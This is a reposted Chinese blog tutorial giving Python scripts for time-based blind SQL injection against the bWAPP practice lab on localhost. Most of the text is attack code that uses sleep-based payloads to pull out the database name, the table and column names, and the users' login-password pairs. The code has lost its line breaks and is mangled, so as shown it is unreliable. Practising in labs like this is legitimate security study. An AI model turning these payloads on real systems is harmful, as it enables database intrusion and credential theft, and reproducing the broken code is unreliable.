sql盲注python脚本学习（基于bWAPP靶场）

时间:2025/7/12 8:02:03来源：https://blog.csdn.net/m0_71332744/article/details/141496968 浏览次数:2次

全局部分

# 数组转字符串
from shlex import join
# 请求
import requests
# 记时
import timer = requests.session()

获取当前库名

def get_db_name_length():len = 1while(1):sql_str = f"1' or if(length(database())={len},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time()-start)>1: return lenlen+=1def get_db_name(max):db_name = [''] * maxfor len in range(1,max+1,1):ACI = 48while(ACI<128):sql_str = f"1' or if(ascii(substr(database(),{len},1))={ACI},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:db_name[len-1]=chr(ACI)breakACI +=1return db_namedb_name = get_db_name(get_db_name_length())
print(join(db_name))
# 结果：b W A P P

获取全部表名

def get_table_name_length():len = 1while(1):sql_str = f"1' or if(length((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))={len},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time()-start)>1:return lenlen+=1def get_table_name(max):table_name = [''] * maxfor len in range(1,max+1,1):ACI = 48while(ACI<128):sql_str = f"1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),{len},1))={ACI},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:print(chr(ACI))table_name[len-1]=chr(ACI)breakACI +=1return table_nametable_name=get_table_name(get_table_name_length())
print(join(table_name))
# 结果：b l o g '' h e r o e s '' m o v i e s '' u s e r s '' v i s i t o r s

获取字段名

仅仅更改sql_str

sql_str = f"1' or if(length((select group_concat(column_name) 
from information_schema.columns where table_schema='bWAPP' and table_name='users'))=
{len},sleep(1),1) -- "sql_str = f"1' or if(ascii(substr((select group_concat(column_name) 
from information_schema.columns where table_schema='bWAPP' and table_name='users'),
{len},1))={ACI},sleep(1),1) -- "

获取用户信息

def get_users_passwd():cou = 1while (1):sql_str = f"1' or if(length((select group_concat(concat(login,'-',password)) from bWAPP.users))={cou},sleep(0.1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:print(cou)breakcou+=1user_str = ['']*coufor x in range(1,cou,1):ACI = 48while (ACI < 128):sql_str = f"1' or if(ascii(substr((select group_concat(concat(login,'-',password)) from bWAPP.users),{x},1))={ACI},sleep(0.1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:print(chr(ACI))user_str[x-1]=chr(ACI)breakACI+=1return join(user_str)

关键字：sql盲注python脚本学习（基于bWAPP靶场）

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com